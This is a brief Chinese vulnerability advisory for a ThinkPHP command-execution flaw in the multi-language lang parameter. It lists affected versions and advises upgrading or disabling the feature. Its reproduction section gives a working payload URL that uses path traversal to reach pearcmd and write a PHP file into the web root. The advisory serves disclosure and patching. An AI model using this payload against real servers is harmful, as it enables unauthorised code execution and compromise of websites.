ThinkPHP 命令执行漏洞 CNVD-2022-86535
漏洞描述
该漏洞是由于 Thinkphp 开启了多语言功能,并且对参数 lang 传参过滤不严谨,导致攻击者可利用该漏洞执行命令。
漏洞影响
ThinkPHP >=V6.0.1,<=V6.0.13
ThinkPHP >=V5.0.X,<=V5.1.X漏洞复现
payload:
/index?lang=…/…/…/…/…/…/…/…/usr/local/lib/php/pearcmd&+config-create+/&/+/var/www/html/test.php漏洞修复
官方已发布漏洞补丁及修复版本,可以评估业务是否受影响后,酌情升级至安全版本。
如不需要多语言功能,请及时关闭此功能,可参考官方文档: